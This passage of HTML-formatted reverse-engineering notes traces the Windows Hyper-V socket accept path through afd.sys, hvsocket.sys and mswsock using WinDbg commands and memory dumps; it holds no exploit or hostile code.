<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ObjectHeader: ffffda8529acc6a0 (new version)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HandleCount: 1 PointerCount: 2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Directory Object: 00000000 Name: \Endpoint {Afd}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next NtDeviceIoControlFile</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS WINAPI NtDeviceIoControlFile(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE FileHandle, - 144 File (---) \Device\Afd)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE Event, - 140 (Event)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PIO_APC_ROUTINE ApcRoutine, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID ApcContext, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PIO_STATUS_BLOCK IoStatusBlock, 00F6F5D0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG IoControlCode, 00012010 (afd!AfdAccept)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID InputBuffer, </span><span style="background-color: transparent; color: #0070c0; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00F6F5D8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG InputBufferLength,0xС</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PVOID OutputBuffer, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG OutputBufferLength 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd </span><span style="background-color: transparent; color: #4472c4; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00F6F5D8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f5d8 00000000 00000001 00000148 00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Go to afd!AfdAccept:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">IoIs32bitProcess, next ObReferenceObjectByHandle (Handle – 0x148), then в rax загружается ссылка на AfdDeviceObject (0FFFFDA8527DE29D0h) </span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!devobj 0FFFFDA8527DE29D0h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Device object (ffffda8527de29d0) is for:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Afd \Driver\AFD DriverObject ffffda8527de19c0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Current Irp 00000000 RefCount 85 Type 00000011 Flags 00000050</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Dacl ffffcb8a7e8ccd11 DevExt 00000000 DevObjExt ffffda8527de2b20 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ExtensionFlags (0x00000800) DOE_DEFAULT_SD_PRESENT</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Characteristics (0x00020000) FILE_DEVICE_ALLOW_APPCONTAINER_TRAVERSAL</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Device queue is not busy.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fild in _AFD_CONNECTION struct with offset +8h is compated with AfdDeviceObject. Next nt!KeAcquireInStackQueuedSpinLock and afd! AfdGetReturnedConnection. Result (in rax):</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @rax</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`298e7ac0 0002</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd8</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00061000 28bf3e40 ffffda85 ........@>.(....</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`298e7ad0 28fa1180 ffffda85 db95c080 fffff803 ...(............</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`298e7ae0 27121080 ffffda85 17d0e6d1 00000019 ...'............</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">then afd!AfdAcceptCore (1-й parameter - IRP)</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd @rdx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`29b80860 0002afd0 01000000 00000100 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`29b80870 297cf380 ffffda85 db95c048 fffff803</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd @r8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`298e7ac0 0002afd8 00061000 28bf3e40 ffffda85</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`298e7ad0 28fa1180 ffffda85 db95c080 fffff803</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Inside of function: nt!KeAcquireInStackQueuedSpinLockAtDpcLevel, then afd! AfdSetupAcceptEndpoint (nt!ExFreePoolWithTag is executed only) next nt!KeReleaseInStackQueuedSpinLockFromDpcLevel, return to afd!AfdAccept: nt!KeReleaseInStackQueuedSpinLock, then afd!AfdDerefTLBaseEndpoint и afd!AfdTLCloseEndpoint, and hvsocket! VmbusTlCommonProviderCloseEndpoint is called, next is hvsocket!VmbusTlQueueEndpointAction which initialise work queue hvsocket!VmbusTlEndpointActionWorkQueueRoutine using netio! NetioInsertWorkQueue. Next hvsocket! VmbusTlCommonProviderCloseEndpoint resturns 103h. Next afd!AfdTlDereferenceTransport is called (WskTdiTransport was checked – I have zero value during tracing). netio!NmrClientDetachProviderComplete may be called. Return to afd!AfdAccept, next nt!ObfDereferenceObject and nt!IofCompleteRequest. Go away from afd.sys</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After some time hvsocket!VmbusTlEndpointActionWorkQueueRoutine will be executed. hvsocket!VmbusTlCommonEndpointCleanup is called from it, next afd!AfdTLCloseEndpointComplete (we can see DbgPrint call with 'Failed to close TLI endpoint! Status=%lx, AFD endp=%p' message. We can see it rarely In windows kernel. WPP is used usually). 2</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 4.8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: super;">nd</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> paramaters is not zero and therefore go to afd! AfdDereferenceEndpointInline, return to hvsocket.sys. Next hvsocket!VmbusTlEndpointDestructor, then nt!PsReturnPoolQuota и nt!ObfDereferenceObject (form ServerExample.exe process object). We can see wotk with VmbusProviderContext variable:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dps VmbusProviderContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e0b8 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ffffda85`27f6ba80</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e0c0 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e0c8 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e0d0 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e0d8 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e0e0 00000000`00040001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e0e8 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e0f0 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e0f8 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e100 ffffda85`27f2c0b0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e108 ffffda85`27f2c0b0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e110 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e118 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e120 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e128 fffff803`db95c260 hvsocket!WPP_ThisDir_CTLGUID_HvSocketTraceGuid</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95e130 00000000`00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dps 0FFFFDA8527F6BA80</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6ba80 00000000`00000006</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6ba88 00000000`00000009</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6ba90 00000000`00000001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6ba98 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6baa0 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6baa8 00000000`00060001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bab0 ffffda85`27f6bab0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bab8 ffffda85`27f6bab0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bac0 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bac8 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bad0 fffff803`db951e50 hvsocket!HvSocketProviderDestructor</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bad8 00000000`00000001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bae0 ffffda85`27f6b9a0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bae8 ffffda85`27f6b8c0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6baf0 fffff803`db32d160 afd!AfdTlClientDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6baf8 00000000`00000001</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlEndpointWorkQueueDestructor is queued using netio!NetioInsertWorkQueue, then go from hvsocket!VmbusTlEndpointDestructor to netio!NetioInsertWorkQueue and then go to windows kernel…</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next we returnt to mswsock!WSAAccept, mswsock!SockNotifyHelperDll is called next, then go to mswsock!SockCoreAccept.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">wshhyperv!WSHGetSocketInformation is called 3 times next wshhyperv!WSHGetSocketInformation and then mswsock!SockUpdateWindowSizes.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Mswsock!SockGetTdiHandles is called, which goes to ntdll!NtDeviceIoControlFile execution:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS WINAPI NtDeviceIoControlFile(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE FileHandle, - 148 File (---) \Device\Afd)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE Event, - 140 (Event)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PIO_APC_ROUTINE ApcRoutine, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID ApcContext, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PIO_STATUS_BLOCK IoStatusBlock, 00F6F424</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG IoControlCode, 00012037 (AfdDispatchImmediateIrp)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID InputBuffer, </span><span style="background-color: transparent; color: #0070c0; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00F6F5D8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
